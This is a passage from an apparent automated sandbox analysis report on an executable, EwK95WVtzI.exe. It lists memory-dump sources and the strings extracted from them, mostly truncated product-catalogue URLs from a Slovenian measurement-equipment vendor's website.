00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/rutinske-kontrole/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/validacije/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/kompletni-ka
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/prospekti-br
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/ir-termometri/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/merilnik-kvalitete-olja-
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilnik-vsebno
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilniki-ph/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilniki-prevo
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-termometri/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-vlagomerji-higr
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/data-logger
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/zivilska-in
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/livarski-termomete
